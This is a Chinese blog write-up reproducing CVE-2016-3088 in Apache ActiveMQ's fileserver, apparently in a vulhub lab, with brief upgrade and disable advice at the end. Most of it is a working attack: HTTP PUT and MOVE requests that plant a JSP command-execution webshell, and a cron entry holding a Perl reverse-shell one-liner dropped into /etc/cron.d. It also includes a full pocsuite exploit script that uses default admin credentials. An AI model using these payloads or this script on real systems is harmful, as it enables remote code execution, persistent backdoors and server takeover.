影响版本:Apache ActiveMQ 5.0.0 – 5.13.2fileserver 这个应用
vulhub拉取漏洞环境docker启动
ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT 方法上传文件到指定目录,下载 ActiveMQ 5.7.0 源码 ,可以看到后台处理 PUT 的关键代码如下
用户可以上传文件到指定目录,该路径在 conf/jetty.xml 中定义,如下
顺着 PUT 方法追踪,可以看到调用了如下函数
同时看到后台处理 MOVE 的关键代码如下,可以看到该方法没有对目的路径做任何限制或者过滤。
由此,我们可以构造PUT请求上传 webshell 到 fileserver 目录,然后通过 Move 方法将其移动到有执行权限的 admin/ 目录。
可以爆破目录(未复现成功)
1 2 3 4 5 6
PUT /fileserver/test/123/123 HTTP/1.1 Host: 172.20.10.3:8161 Content-Length: 4 Content-Length: 4 test
admin 登陆查看目录
首先 PUT 一个 Webshell 的txt到 fileserver 目录
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
PUT /fileserver/1.txt HTTP/1.1 Host: 172.20.10.3:8161 Content-Length: 330 <%@ page import="java.io.*"%> <% out.print("Hello</br>"); String strcmd=request.getParameter("cmd"); String line=null; Process p=Runtime.getRuntime().exec(strcmd); BufferedReader br=new BufferedReader(new Input StreamReader(p.getInput Stream())); while((line=br.readLine())!=null){ out.print(line+"</br>"); } %>
查看发现上传成功
由于上传的是文本文件并不能被服务器解析,所以我们下一步要利用MOVE方法将上传的webshell移动到可以执行的目录并更改后缀为jsp。
可以解析jsp文件的路径有:
1./opt/activemq/webapps/api
2./opt/activemq/webapps/admin
1 2 3 4 5 6 7 8 9 10
MOVE /fileserver/1.txt HTTP/1.1 Destination: file:///opt/activemq/webapps/api/1.jsp Host: 172.20.10.3:8161 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Cookie: JSESSIONID=node016s6o5xkj6jyp130d905yk3j4l1.node0 Connection: close
这里有一个坑,困惑了我很久,我的方法步骤都没有问题为什么MOVE方法会一直响应超时并且得不到任何响应的内容。尝试了很久,我一度怀疑我的
vulhub环境有问题,一次偶然中我用burp抓到的包去修改执行MOVE方法很快就得到了响应结果,神奇的是把这个数据包重新复制到repeater执行再次出现
响应超时的结果,明明是两个相同的数据包,真是令人费解,有的时候在正常渗透测试过程也会发现这个情况,根据xssle师傅分析可能是MOVE方法不稳定导致的
然后访问即可
http://172.20.10.3:8161/api/1.jsp?cmd=ls
写入反弹计划命令
1 2 3 4 5 6 7 8 9
PUT /fileserver/1.txt HTTP/1.1 Host: 172.20.10.3:8161 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 250 */1 * * * * root /usr/bin/perl -e 'use Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
这里在命令后面注意把换行符修改为0a,也就是linux中的\n
移动到/etc/cron.d/目录下,遇到ubuntu目录不太一样,参考这里
docker未安装ssh未复现,可参考这里
进入metasploit,搜索2016-3088
直接淦就完事了
根据漏洞的原理进行编写 验证模块PUT成功即可 攻击模块进行MOVE操作
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87
from pocsuite.net import req from pocsuite.poc import POCBase,Output from pocsuite.utils import register class ActiveMQPoc(POCBase): vulID = '002' version = '1.0' author = ['ol4three'] vulDate = '2020-12-17' updateDate = '2020-12-17' references = ['https://paper.seebug.org/346/'] name = 'Apache ActiveMQ (CVE-2016-3088 )' appPowerLink = 'activemq.apache.org' appName = 'Apache activemq' appVersion = ' Apache ActiveMQ 5.14.0' vulType = 'Arbitrary File Reading' desc = ''' fileserverfileserverjsp\ MOVEMOVE ''' pocDesc = ''' pocsuite -r ***.py -u target --verify" ''' samples = [] install_requires = [] def _verify(self): result = {} path = "fileserver/1.txt" path1 = "api/1.jsp?cmd=ls" url = self.url + '/' + path try: resp = req.put(url) resp1 = req.get(url) if (resp.status_code == 204 and str(resp1.status_code)[0] in ('2', '3')): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url except Exception as ex: pass return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): result = {} path = "fileserver/1.txt" path1 = "api/1.jsp?cmd=id" url = self.url + '/' + path url1 = self.url + '/' + path1 data1 = '1' data = '<%@ page import="java.io.*"%><%out.print("Hello</br>");String strcmd=request.getParameter("cmd");String line=null;Process p=Runtime.getRuntime().exec(strcmd);BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));while((line=br.readLine())!=null){out.print(line+"</br>");}%>' headers ={ 'Destination' : 'file:///opt/activemq/webapps/api/1.jsp' } headers1={ 'Authorization':'Basic YWRtaW46YWRtaW4=', 'Connection':'close' } proxies={ 'http':'127.0.0.1:8080', 'https':'127.0.0.1:8080' } try: resp = req.put(url,data=data) resp1 = req.get(url) resp2 = req.request('MOVE',url=url,headers={'Destination' : 'file:///opt/activemq/webapps/api/2.jsp'}) resp3 = req.get(url1,headers=headers1) resp3 = resp3.text[12:50] result['AdminInfo'] = {} result['AdminInfo']['SHELL'] = url1 result['AdminInfo']['EXEC '] = resp3 except Exception as ex: pass return self.parse_output(result) register(ActiveMQPoc)
1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。
2、通过移除 conf\jetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能
https://paper.seebug.org/346/
http://tengxiaofei.run/2020/06/09/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-Apache%20ActiveMQ/
FROM :ol4three.com | Author:ol4three
评论